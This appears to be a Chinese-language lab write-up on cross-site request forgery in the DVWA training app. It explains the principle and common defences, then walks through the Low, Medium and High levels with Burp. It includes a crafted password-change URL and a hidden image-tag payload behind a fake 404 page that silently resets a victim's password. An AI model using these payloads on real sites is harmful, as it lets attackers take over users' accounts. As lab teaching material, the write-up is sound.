原理:
在用户登陆网站后,网站中的验证cookie没有过期时,引诱用户访问带有恶意脚本的连接网页,从而借助用户的cookie进行非法操作
防御:
验证HTTP Referer字段;(referer中存在http请求的来源地址)
在请求地址中添加token并验证;(token不存在与cookie中)
在HTTP头中自定义属性并验证。
Low:
输入修改的密码
使用burp进行抓包,查看数据包信息
更改密码后放包
重新登录进行测试
显示登陆失败
登陆成功
或者对网址进行添加恶意链接
http://ip/dvwa-master/vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=Change#
用户点击后,会直接弹出Password Changed.将密码改为admin
此时密码修改完成
Medium:
这个等级也是可以通过上述抓包进行修改(不做演示)
其对url进行了进一步的过滤
在phpstudy中放入以下文件
<·img src=“http://192.168.8.8/dvwa-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#” border=“0” style=“display:none;”/>
<·h1>404<·h1>
<·h2>file not found.<h2·>
关闭代理后,发现密码修改成功
修改成功
High:
抓包直接修改没用
用到burp中的一个拓展
填写以下信息
将响应包发到重放器中修改密码
关闭代理查看页面
修改成功